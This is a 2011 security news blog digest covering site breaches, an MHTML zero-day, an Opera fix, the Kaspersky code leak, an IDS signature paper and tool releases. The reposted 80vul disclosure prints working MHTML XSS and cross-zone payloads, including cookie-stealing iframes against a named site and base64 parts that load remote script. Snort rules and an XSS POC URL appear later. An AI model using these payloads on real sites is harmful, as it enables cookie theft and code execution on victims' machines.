Jan 29, 2011

r00tsecurity.org and uNKn0wn.eu hacked

Both sites are hacker underground sites, and the names, usernames and passwords of their users were exposed. Details are at the link below.

r00tsecurity.org & uNkn0wn.eu #Hacked and Exposed  http://pastebin.com/G2c3mT9k  LOL

Source: @securityshell

Hacking with mhtml protocol handler

Details and examples of attacks through the mhtml protocol handler.


Hacking with mhtml protocol handler

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References:http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt

Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) was finally
released yesterday. It contains two articles about browser security [0x05
and 0x06]. Combining the two, we can complete a lot of interesting
attacks...
1.Cross Site Scripting by upload mhtml file

With the mhtml protocol handler the file extension is ignored, so the
attacker can rename the mhtml file to a *.jpg file, etc., and then upload it to
the target site...

Of course, we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload
file format security restrictions.

Then point an iframe src at it:

<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie"></iframe>
2.Cross Site Scripting mhtml-file string injection

The mhtml file format is based only on CRLF, so if we can inject CRLF, the
site may be attacked.

PoC:

Please test it on a Win7 system.

<iframe src="mhtml:http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BDQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly93d3cuODB2dWwuY29tLyI%2BPC9pZnJhbWU%2BDQo8c2NyaXB0Pg0KYWxlcnQoZG9jdW1lbnQuY29va2llKTsNCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA%2FIGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg%3D%3D%0D%0A--_boundary_by_mere--%0D%0A!cookie"></iframe>

On a Win XP or Win 2k3 system, please URL-encode the payload a second time.

mhtml string injection into a JSON file: some sites restrict the JSON
file's Content-Type to defend against XSS. Maybe we can use mhtml string
injection to get past it :)
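A server-side check for the two cases above (an MHTML container hidden inside a renamed upload, and one injected through CRLF in a URL parameter), written here as an added example rather than code from the 80vul post. The markers it looks for are the ones the post's own payloads use; the sample inputs are constructed.

```python
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Markers taken from the payloads in the post: the container header that opens
# an MHTML file, and the per-part header that names the part an "mhtml:...!name"
# URL will reference.
_CONTAINER_RE = re.compile(
    rb'content-type\s*:\s*multipart/related\s*;[^\r\n]*?boundary\s*=\s*"?([^"\r\n;]+)"?',
    re.IGNORECASE,
)
_LOCATION_RE = re.compile(rb'content-location\s*:\s*([^\r\n]+)', re.IGNORECASE)


def percent_decode(data: bytes, rounds: int = 2) -> bytes:
    """Undo URL encoding up to `rounds` times (the post notes that XP/2003
    need the payload double-encoded), stopping once decoding is stable."""
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def find_mhtml_container(data: bytes) -> Optional[dict]:
    """Return the boundary, offset and part names of an MHTML container found
    anywhere in `data`, or None. Scanning the whole buffer matters because
    `copy /b 1.jpg + 1.mhtml 2.jpg` puts the container after a genuine image."""
    data = percent_decode(data)
    header = _CONTAINER_RE.search(data)
    if not header:
        return None
    boundary = header.group(1).strip()
    body = data[header.end():]
    delimiter = b'--' + boundary
    if delimiter not in body:
        return None  # a header with no matching delimiter cannot be rendered as parts
    names = []
    for part in body.split(delimiter)[1:]:  # bytes before the first delimiter are preamble
        if part.startswith(b'--'):
            break  # "--boundary--" closes the container
        location = _LOCATION_RE.search(part)
        if location:
            names.append(location.group(1).strip().decode('latin-1'))
    return {'offset': header.start(),  # offset within the decoded buffer
            'boundary': boundary.decode('latin-1'),
            'parts': names}


def is_disguised_upload(data: bytes, declared_type: str) -> bool:
    """True when the declared MIME type is not a MIME container type but the
    bytes carry an MHTML container (the renamed-to-.jpg case)."""
    base = declared_type.split(';', 1)[0].strip().lower()
    if base in ('message/rfc822', 'multipart/related'):
        return False
    return find_mhtml_container(data) is not None


# Constructed sample: a JPEG prefix with the post's container appended after it.
SAMPLE_JPG_MHTML = (
    b'\xff\xd8\xff\xe0\x00\x10JFIF\x00' + b'A' * 32
    + b'Content-Type: multipart/related; boundary="_boundary_by_mere"\r\n\r\n'
    b'--_boundary_by_mere\r\n'
    b'Content-Location:cookie\r\n'
    b'Content-Transfer-Encoding:base64\r\n\r\n'
    b'PGJvZHk+PC9ib2R5Pg==\r\n'
    b'--_boundary_by_mere--\r\n'
)
# Constructed sample: the same container arriving URL-encoded inside a JSONP
# callback parameter, i.e. the CRLF-injection case.
SAMPLE_QUERY = (
    b'icode=abc&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere'
    b'%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0A'
    b'Content-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BPC9ib2R5Pg%3D%3D'
    b'%0D%0A--_boundary_by_mere--%0D%0A'
)

if __name__ == '__main__':
    print(find_mhtml_container(SAMPLE_JPG_MHTML))
    print(find_mhtml_container(SAMPLE_QUERY))
    print(is_disguised_upload(SAMPLE_JPG_MHTML, 'image/jpeg'))
```

A check that only inspects the first bytes of an upload (magic-number sniffing) passes the concatenated file, which is why the scan covers the whole buffer.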
3.bypass X-Frame-Options

X-Frame-Options does not protect against the mhtml protocol handler.

the demo:

<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie"></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php"></iframe>
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul

Billy (BK) Rios introduced a very interesting approach to stealing local files
at RuxCon/Baythreat (https://xs-sniper.com/blog/2010/12/17/will-it-blend/).
It used "Script src to local files in the LocalLow directory" via file://
+ Java applet + Adobe Reader + Adobe Flash to complete it. But with
mhtml+file://uncpath it is so easy to do.

Demo:

test it on win2k3+ie8+Adobe Reader 9
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator

5.mhtml+file://uncpath+word == local xss vul

demo:http://www.80vul.com/mhtml/word.doc

Download it, save it as c:\word.doc and open it. You will get an alert with
the content of c:\boot.ini.

This is based on "Microsoft word javascript execution"
(http://marc.info/?l=bugtraq&m=121121432823704&w=2).

To make the proof of concept, follow these steps:
  1. Make an html file and paste the xss code
  2. Open the html file with Word and save it as c:\word.xml
  3. Open word.xml with Notepad and inject the mhtml code in <w:t>aaaaa</w:t>
  4. Rename c:\word.xml to c:\word.doc
  5. Open the c:\word.doc file

xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>
aaaaa
----------------------------------------------------------

mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--

*/
--------------------------------------------------------

If you use this vulnerability to attack someone, you need to know the path where
the downloaded Word file is saved; a lot of people use the desktop :)

"Microsoft word javascript execution" only works on Office 2k3 and 2k7. In
other versions you can make the link and point its src to http://www.80vul.com/hackgame/word.htm
6. Cross Zone Scripting

First we would like to mention a very old vulnerability:

<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111
CODEBASE=c:/winnt/system32/calc.exe></OBJECT>

This vulnerability (by firebug9 [http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html])
allows you to execute any program in the "My Computer" zone. It has been tested and
found to work on ie6/ie7/ie8 + win2k/winxp/win2k3.

Then repeat the steps of "5.mhtml+file://uncpath+word == local xss vul" with these changes:

xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>
aaaaa
----------------------------------------------------------

mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--

*/
--------------------------------------------------------

Source: http://seclists.org/fulldisclosure/2011/Jan/224

Zero day vulnerability found in Windows MHTML renderer

A vulnerability has been found in the Windows MHTML renderer that allows commands to run in any Windows zone. Microsoft has released a Fix it tool for it in the meantime, and a patch is expected in the next Windows Update.


Microsoft Fix it for MHTML flaw

Microsoft has just released security advisory 2501696 acknowledging a new zero day flaw in all current versions of Windows (except Server Core). The flaw appears to allow maliciously crafted web pages to execute code in any "zone" regardless of which zone is specified.
Any applications that use Microsoft's HTML renderer can be attacked including Internet Explorer, but applications that always open web content in the "Restricted zone" are not affected including Outlook, Outlook Express, and Windows Mail.
There is proof of concept code in the wild and it seems to be only a matter of time before we see criminals trying to exploit this flaw. For individuals, or people who only manage a small number of computers, Microsoft has provided a Fix it tool that allows you to apply their recommended settings without having to use GPOs or having to manually edit registry keys.
The SANS Internet Storm Center has posted a blog on this as well, noting all the current locations for information on this vulnerability.
Microsoft has provided mitigation advice and I highly recommend you consider deploying the mitigation settings using Group Policy Objects (GPOs) as soon as possible. It will likely be some time before Microsoft is able to release a patch for this vulnerability and this is one of the cases where it is likely worth the effort to implement the mitigations.

Source: http://nakedsecurity.sophos.com/2011/01/28/zero-day-vulnerability-found-in-windows-mhtml-renderer/

Opera Fix Large HTML Form Vulnerability and Release Opera 11.01

Opera has released a new version, v11.01, to fix the large HTML form vulnerability.


A few days ago we wrote about a crash in the Opera web browser that could lead to memory corruption and leave the browser open for arbitrary code to be executed. The bug was reported by Jordi Chancel on January 7th and revolves around an integer truncation error when handling an HTML “select” element containing an overly large number of children.
Shortly after publishing our post Opera Software left us a comment:
From Opera Software: The newest version of the Opera desktop browser released today, 11.01, contains a security fix for this bug. You can download Opera 11.01 from http://www.opera.com/browser/
According to the 11.01 change log, six security issues were fixed in the 11.01 release, including “fixed an issue where large form inputs could allow execution of arbitrary code, as reported by Jordi Chancel”.
The advisory on Opera’s web site says that “when certain large form inputs appear on a web page, they can cause Opera to crash. In some cases, the crash can lead to memory corruption, which could be used to execute code. To inject code, additional techniques will have to be employed.” They also go on to thank Jordi Chancel for reporting the issue.
Opera 11 was released last month and introduced tab stacking, extensions, visual mouse gestures and most importantly, from a security point of view, a redesigned address field which displays a clear badge indicating the security level of the web site.

Source: http://www.livehacking.com/2011/01/28/opera-fix-large-html-form-vulnerability-and-release-opera-11-01/

SourceForge Site Compromised By Attackers

Last Wednesday SourceForge, the big name in open source project hosting, was attacked, and efforts are under way to find the cause and the impact. Various things were altered, including the CVS system.

The recent rash of attacks against free and open source software projects continued this week with an attack that targeted SourceForge, the popular repository for open source projects. The attack compromised a number of separate systems, including the site's CVS system.
The administrators at SourceForge detected the intrusion on Wednesday and during the investigation, they discovered that the attackers had succeeded in gaining access to several machines. After the attack was discovered, they quickly took a number of services offline, including the CVS system, Web-based code browsing, file upload capability and interactive shell services.
"Our immediate priorities are to prevent further exposure and ensure data integrity.  We have all hands on deck working on identifying the exploit vector or vectors, eliminating them, and restoring the impacted services," the SourceForge staff wrote in a blog post on the attack.

"The problem was initially discovered on the servers that host CVS but our analysis indicates that several other machines were involved, and while we believe we’ve determined the extent of the attack, we are verifying all of our other services and data."
On Thursday, SourceForge staffers said that they were still in the process of trying to determine the full extent of the attack and that several services were still offline.
"CVS, ViewVC, file release uploads, and interactive shell services are still disabled while we do the work to make sure our servers and services are hardened against future attacks like this," the staff said.
SourceForge is a resource site that enables developers to store projects under development and also serves as a download site for users.
The attack against SourceForge is the latest in what's become a string of such incidents affecting free and open-source software projects. Earlier this week officials at the Fedora Project disclosed an attack against the project's infrastructure. That incident was relatively minor, in that it resulted from the compromise of one user's account credentials and the attacker didn't make any changes to the Fedora packages.
In December attackers were able to compromise the main server used to distribute the ProFTPD software and insert a backdoor into the software code. The backdoored version of the software was mirrored to all of the other sites that distribute the software and the compromised version was available for download for several days before the intrusion was discovered.

Source: http://threatpost.com/en_us/blogs/sourceforge-site-compromised-attackers-012811

Former Kaspersky Employee Responsible for Leaked Source Code

Following earlier news that the Kaspersky Anti-Virus 2008 source code had leaked, a Kaspersky spokesperson has said the source code was stolen in early 2008 by a former employee.


That employee was later arrested and sentenced to three years in prison.

Details below.






Kaspersky Lab reveals that former employee stole source code
The Kaspersky source code that recently made its way onto public websites was leaked by a former employee of the antivirus vendor, who is already serving a prison sentence for intellectual property theft.

Yesterday, we reported about the complete source code of an older Kaspersky product being available on publicly accessible torrent and file hosting sites.

The code was last modified in December 2007 and judging by the directory tree it probably corresponds to a beta version of Kaspersky Internet Security 8.0.

Russian technology publication CNews quotes [Google translation] a Kaspersky Lab spokesperson, according to whom a former employee with legitimate access to the source code stole it in early 2008.

It's not clear if he did it out of revenge or entirely for profit, but he ended up offering it for sale on the black market.

The former worker was subsequently arrested and sentenced to three years in jail, to be followed by another three of supervised release.

Kaspersky stressed the security of its current products was not at risk because they only contained small parts of the leaked code which didn't concern protection functions.

It is likely that having knowledge of the leak for almost two years, the company rewrote the most critical parts of the code and made significant changes to its technology.

In addition, the vendor was aware the leaked sources were being distributed on private forums since November 2010, so it probably anticipated a full-blown public exposure.

People should be aware that even if publicly available, the source code remains the intellectual property of Kaspersky Lab and downloading, distributing or using it without consent is illegal.

The company has yet to respond to our inquiries or issue a public statement in English. We will keep you up to date with new information when it becomes available.

Source: http://news.softpedia.com/news/Former-Kaspersky-Employee-Responsible-for-Leaked-Source-Code-181367.shtml

Generic Attack Detection Engine

An article about building IDS/IPS rules to defend against web attacks.

 

“Generic Attack Detection Engine”

Abstract
This paper covers a new technique that can help IDS/IPS solution developers provide more protection against web attacks. The approach is very generic and can be adopted by any IDS/IPS solution provider. Presently the approach is just an idea, and it requires more research and experiment to turn it into a working solution.
This approach helps enhance the quality of signature based IDS/IPS solutions and provides good coverage with respect to evasion techniques.
Introduction
There are some web attacks that can be performed against many different applications; let us call them “Generic Attacks”. These attacks also involve evasion techniques to bypass signature based IDS/IPS protection mechanisms.
Generic Attack Names:-
  1. Cross Site Scripting
  2. SQL Injection
  3. Shell Code Execution
  4. Directory Traversal
  5. Buffer overflow
  6. Remote File Inclusion

Presently, most signature based IDS/IPS solution providers provide one signature per vulnerability, or they may write a few more signatures for the same vulnerability to cover evasion techniques; either way, most IDS/IPS solutions follow this approach.
This approach allows the attacker to bypass IDS/IPS detection using evasion techniques.
There are some other limitations of the current approach, which are covered below under the “Problem” heading.
Problem
To explain the problem more clearly let me start with an example:-
Threat Information: – Cross-Site Scripting (XSS) vulnerability in the com_search module for Joomla! 1.0.x through 1.0.15 allows remote attackers to inject arbitrary web script or HTML via the ordering parameter to index.php.
In the above vulnerability we can see that the “Joomla” application is vulnerable to an XSS attack via the “ordering” parameter.
Sample POC/Exploit for above vulnerability
http://attacker.in/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
The above POC is just one type of XSS case; there are many other evasion techniques an attacker can use to conduct the attack, but the vulnerable parameter “ordering” remains the same in the other XSS cases.
To detect the above attack, the signature developer writes a single signature or multiple signatures to cover some XSS evasion techniques. But there is a very high chance that the developer misses some evasion techniques, or in many cases he/she may not be able to write multiple signatures due to the performance limits of the detection engine, as more signatures mean more processing time.
A sample IDS signature (Snort rule) that a developer can write to detect the above malicious URL is as below:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Joomla XSS Attack"; flow:established,to_server; content:"index.php"; nocase; http_uri; content:"ordering="; nocase; http_uri; pcre:"/ alert\x28document\.cookie\x29\x20style /smi"; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
The same approach is followed while developing signatures for other attacks.
One important point here is that the way an XSS attack is conducted is mostly common across applications; the only thing that varies is the parameter, argument or function. In the above vulnerability the parameter is “ordering”, and in an XSS vulnerability in another application this parameter can be something else, let’s say “userid”.
Snort rules:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-PHP phpBB mod tag board sql injection attempt"; flow:established,to_server; content:"tag_board.php"; fast_pattern; nocase; http_uri; content:"action=delete"; nocase; http_uri; content:"id="; nocase; http_uri; pcre:"/tag_board.php\x3F[^\r\n]*action=delete[^\r\n]*id=[^\r\n\x26]*(select|insert|delete)/Usmi"; threshold:type limit, track by_src, count 1, seconds 300; metadata:policy security-ips alert, service http; reference:bugtraq,32701; reference:cve,2008-6314; classtype:web-application-attack; sid:15425; rev:5;)
In the above Snort rule, the signature covers only one evasion technique for detecting the SQL injection.
There are many other ways an attacker can bypass this detection rule.
For example, the attacker can provide the select, insert or delete query with /**/ comments inside the keyword, as in S/**/E/**/L/**/ECT, which the database later normalizes to SELECT. As we can see, this is not covered by the above signature.
This is just one way of performing SQL injection; there are many more ways an attacker can use to conduct the attack. For more details you can search for SQL injection evasion techniques.
Like the above rule, you can find more signatures that have the same limitations:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql with comments injection attempt - GET parameter"; flow:to_server,established; content:"/*"; http_uri; content:"*/"; http_uri; pcre:"/(update|exec|insert|union)[^\/\\]*\/\*.*\*\//Uis"; metadata:service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:16431; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql insert injection attempt - POST parameter"; flow:established,to_server; content:"insert "; fast_pattern; nocase; http_client_body; pcre:"/insert\s+into\s+[^\/\\]+/Pi"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:15875; rev:5;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql update injection attempt - GET parameter"; flow:established,to_server; content:"update"; fast_pattern; nocase; http_uri; pcre:"/update\s+[^\/\\]+set\s+[^\/\\]+/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13514; rev:11;)
Weaknesses and Limitations found in current scenario:-
  1. If a new evasion technique is discovered for a web attack (like SQL injection), then a new IDS/IPS signature has to be released for every application that has an SQL injection vulnerability. So the developer has to write one new signature per application to provide protection. There is no single point where all the signatures can be patched against the new evasion technique.
  2. The chance of false negatives is high in the current scenario, as the IDS/IPS signature written for a vulnerability can miss some evasion techniques during the signature development phase or because of the performance limits of the IDS/IPS detection engine.
  3. In the current approach it is difficult for an IDS/IPS solution provider to provide quality assurance parameters per vulnerability, such as how many evasion techniques, or which ones, their signatures cover for a particular vulnerability. Providing such information per vulnerability is difficult.
Brief about signature development:-
Before writing the signature for a vulnerability we first find the parameter, argument or function that has the flaw. Then, while writing the signature, we first match this parameter and then match the attack pattern using either content matching or PCRE.
Here, for the Joomla XSS attack explained above, I am writing a sample signature:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Joomla XSS Attack"; flow:established,to_server; content:"index.php"; nocase; http_uri; content:"ordering="; nocase; http_uri; pcre:"/ alert\x28document\.cookie\x29\x20style /smi"; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
Here I have matched the parameter “ordering” and then matched the attack pattern using PCRE.
We match the parameter first to reduce PCRE matching on the whole traffic, which improves performance and reduces the chance of false positives. Direct PCRE matching on real traffic is very performance intensive.
Idea
Generic Detection Algorithm/Engine:- What I am suggesting is that we can develop a generic detection algorithm/engine for each such generic attack and call it whenever it is required.
In the above case, instead of matching the malicious pattern with a single PCRE, we can call an “XSS detection algorithm/engine” that covers all the possible XSS evasion techniques.
There are multiple advantages to developing and using such an attack detection algorithm/engine:-
  1. Reusability:- The advantage of developing such an engine is that we can call it for any application that is vulnerable to that attack.
  2. Signature Patching:- If a new evasion technique is introduced to conduct the attack, only the detection engine needs to be enhanced to cover it, instead of what we do right now, developing a new signature for every application. At the same time, it reduces the chance of false negatives. It also helps in providing “Zero Day” protection.
  3. Accountability:- With such a detection algorithm/engine we know exactly how many evasion techniques are covered per vulnerability.
  4. Quality Assurance:- Using such a detection algorithm/engine we can be confident about the quality of our signature coverage.
  5. Performance Enhancement:- We can optimize the algorithm and also run it on special hardware, which can improve the performance of the IDS/IPS detection solution.
  6. Automation:- The signature development process can be automated once we have a stable detection engine for the attack.
Details:-
Flow Diagram:-
[Figure: Basic Architecture of Generic Detection Engine]
The following architecture diagram gives you a little idea of how the generic detection approach can work.
In the above diagram we have two branches after Content/Pattern Match: one is “Normal Detection” and the other is “Generic Detection Engine”.
For the generic attacks we have six different attack detection engines that can be called as the detection requires. Each individual detection engine covers all the possible evasion techniques related to its attack.
For example, the XSS engine is capable of detecting all types of XSS attack evasions.
These detection engines are called during signature matching to detect malicious patterns, and return the result.
For all other types of attack we have our normal detection engine, which works like the current detection logic with further Content/PCRE matches.
Detection Levels:-
We can define detection levels in the attack detection engine, such as low, medium and high. If we want to drop some evasion techniques for the sake of appliance performance, the engine has to provide a way to do so.
Detection Engine Parameters:- Possible parameters that the detection engine can have are mentioned below:-
New Construct For IDS/IPS Signature
From the signature development language/syntax point of view we can have some new constructs, such as “engineid” and “detectionlevel” below, to support the new generic detection engine. This is just one way I am thinking of; there can be other ways to integrate/implement the new approach.
OLD RULE:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Joomla XSS Attack"; flow:established,to_server; content:"index.php"; nocase; http_uri; content:"ordering="; nocase; http_uri; pcre:"/ alert\x28document\.cookie\x29\x20style /smi"; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
NEW RULE:-
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Joomla XSS Attack"; flow:established,to_server; content:"index.php"; nocase; http_uri; content:"ordering="; nocase; http_uri; engineid:1; detectionlevel:high; metadata:policy security-ips alert, service http; classtype:web-application-attack; sid:15 )
As you can see, instead of a “pcre” match I am using “engineid”, which is the ID of the XSS engine, and “detectionlevel”. The signature first performs the content matches for “index.php” and “ordering=”; once they match, the “XSS engine” is called to check for all the possible XSS evasion techniques and returns the result. If any match succeeds, the signature is triggered.
With the new approach there is no need to write multiple signatures for different evasion techniques. All of this is taken care of by the generic detection engine.
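The new-rule construct above, worked through as an added example (not the paper's code): an engine table keyed by engineid with low/medium/high check tiers, two rules that reuse the page's sids and content matches, and the Joomla POC plus the S/**/E/**/L/**/ECT split run through them. The engine IDs, the individual checks and the sample requests are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Assumed values for the paper's proposed "engineid" construct.
ENGINE_XSS, ENGINE_SQLI = 1, 2
LEVELS = ['low', 'medium', 'high']


def normalize(value: str) -> str:
    """Undo the evasions the paper names before matching: repeated URL
    decoding, keyword splitting with inline comments (S/**/E/**/L/**/ECT),
    case and whitespace variation."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r'/\*.*?\*/', '', value, flags=re.S)
    return re.sub(r'\s+', ' ', value).lower()


SQL_KEYWORDS = r'\b(select|insert|update|delete|union)\b'

# Each engine is an ordered list of (level, check). A rule's detectionlevel
# decides how far down the list the engine goes: the paper's knob for trading
# evasion coverage against appliance performance.
ENGINES = {
    ENGINE_XSS: [
        # low: the single literal the page's Joomla pcre keys on
        ('low', lambda v: 'alert(document.cookie)' in unquote(v).lower()),
        # medium: any event handler, script tag or javascript: URL after normalisation
        ('medium', lambda v: re.search(r'\bon\w+\s*=|<script|javascript:', normalize(v)) is not None),
        # high: other active-content containers
        ('high', lambda v: re.search(r'<(iframe|object|embed|svg)\b|vbscript:', normalize(v)) is not None),
    ],
    ENGINE_SQLI: [
        # low: keyword match on the raw value, like the page's phpBB rule
        ('low', lambda v: re.search(SQL_KEYWORDS, v.lower()) is not None),
        # medium: the same keywords after decoding and comment stripping
        ('medium', lambda v: re.search(SQL_KEYWORDS, normalize(v)) is not None),
        # high: quote break-out followed by a boolean tautology such as ' or 1=1
        ('high', lambda v: re.search(r"'\s*(or|and)\s+\S+\s*=\s*\S+", normalize(v)) is not None),
    ],
}


def run_engine(engineid: int, value: str, detectionlevel: str):
    """Return the tier of the first enabled check that fires, or None.
    Reporting the tier is what gives the paper's 'accountability' point."""
    enabled = LEVELS[:LEVELS.index(detectionlevel) + 1]
    for level, check in ENGINES[engineid]:
        if level in enabled and check(value):
            return level
    return None


# Rules in the proposed syntax: cheap content matches on the URI, then an
# engine call instead of a per-evasion pcre. sids and msgs are the page's own.
RULES = [
    {'sid': 15, 'msg': 'Joomla XSS Attack',
     'content': ['index.php', 'ordering='], 'engineid': ENGINE_XSS, 'detectionlevel': 'high'},
    {'sid': 15425, 'msg': 'WEB-PHP phpBB mod tag board sql injection attempt',
     'content': ['tag_board.php', 'action=delete', 'id='], 'engineid': ENGINE_SQLI, 'detectionlevel': 'high'},
]


def param_value(uri: str, name: str) -> str:
    """Raw (still encoded) value of a query parameter, '' if absent."""
    query = uri.partition('?')[2]
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        if key.lower() == name.lower():
            return value
    return ''


def inspect_uri(uri: str, rules=RULES):
    """Apply every rule to one request URI and return the alerts raised."""
    alerts = []
    lowered = uri.lower()
    for rule in rules:
        if not all(c.lower() in lowered for c in rule['content']):
            continue  # content matches gate the (more expensive) engine call
        param = rule['content'][-1].rstrip('=')  # last content token names the vulnerable parameter
        level = run_engine(rule['engineid'], param_value(uri, param), rule['detectionlevel'])
        if level:
            alerts.append({'sid': rule['sid'], 'msg': rule['msg'], 'tier': level})
    return alerts


# Constructed requests: the page's Joomla POC, an evaded variant the page's
# single pcre would miss, the comment-split SELECT the paper describes, and a benign search.
JOOMLA_POC = ('/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any'
              '&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;'
              'top:0;left:0;width:100%;height:100%;%22')
JOOMLA_EVADED = '/joomla1015/index.php?option=com_search&ordering=newest%22%20onmouseover=prompt(1)%20x=%22'
PHPBB_EVADED = '/tag_board.php?action=delete&id=1;S/**/E/**/L/**/ECT%20*%20FROM%20users'
BENIGN = '/joomla1015/index.php?option=com_search&ordering=newest'

if __name__ == '__main__':
    for uri in (JOOMLA_POC, JOOMLA_EVADED, PHPBB_EVADED, BENIGN):
        print(uri[:60], '->', inspect_uri(uri))
```

Lowering a rule's detectionlevel to "low" makes the two evaded requests pass silently, which is exactly the coverage-versus-performance trade the paper asks the engine to expose.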
Conclusion and Further Work
I believe this approach helps a lot in IDS/IPS solution development and improves the quality of signatures with respect to evasion techniques. Using this new approach we can overcome the flaws and limitations of the current approach.
A lot of work is required to actually turn this approach into a working solution. Nothing has been tested or implemented yet, so we need to run some experiments to see how well this approach works. Once we have some good results, we need to find a way to implement it as a working solution.

Source: http://www.packetcomputing.com/blog/?p=50

Nmap v.5.50 Released

Nmap, the most popular scanning tool, has released version 5.50.


A primary focus of this release is the Nmap Scripting Engine, which has allowed Nmap to expand up the protocol stack and take network discovery to the next level. Nmap can now query all sorts of application protocols, including web servers, databases, DNS servers, FTP, and now even Gopher servers! Remember those? These capabilities are in self-contained libraries and scripts to avoid bloating Nmap's core engine.

The actual NSE engine became more powerful as well. Newtargets support allows scripts like dns-zone-xfer and dns-service-discovery to add discovered hosts to Nmap's scan queue. We also added a brute forcing engine, network broadcast script support, and two new script scanning phases known as prerule and postrule.
This release isn't just about NSE. We also added the Nping packet probing and analysis tool (http://nmap.org/nping/) in 5.35DC1. Version 5.50 improves Nping further with an innovative new echo mode (http://bit.ly/nping-echo).

Download: http://nmap.org

Source: http://security-sh3ll.blogspot.com/2011/01/nmap-v550-released.html

Jan 28, 2011

Nessus releases a version for the iPhone

Nessus, the system auditing tool, has released a version for the iPhone. It can be downloaded for free from the iTunes store.

Free Nessus App for the iPhone


The Nessus App for iPhone is a great way to keep tabs on running Nessus scans, initiate new scans, and quickly review vulnerability scanning results. The app is available for free in the iTunes store and works with Nessus server versions 4.2 or later and the Nessus PerimeterService.

Source: http://koresecure.com/?p=4448

Jan 27, 2011

Hackers Turn Back the Clock With Telnet Attacks

Hackers are going back to using Telnet to attack servers over mobile networks. If you still have port 23 open for Telnet, switch to SSH instead; it is far safer.


A new report from Akamai Technologies shows that hackers appear to be increasingly using the Telnet remote access protocol to attack corporate servers over mobile networks.
Akamai, which specializes in managing content and Web traffic, issues quarterly reports on Internet traffic trends. The latest report, which covers the third quarter of 2010, shows that 10 percent of attacks that came from mobile networks are directed at Port 23, which Telnet uses. That marks a somewhat unusual spike for the aging protocol.
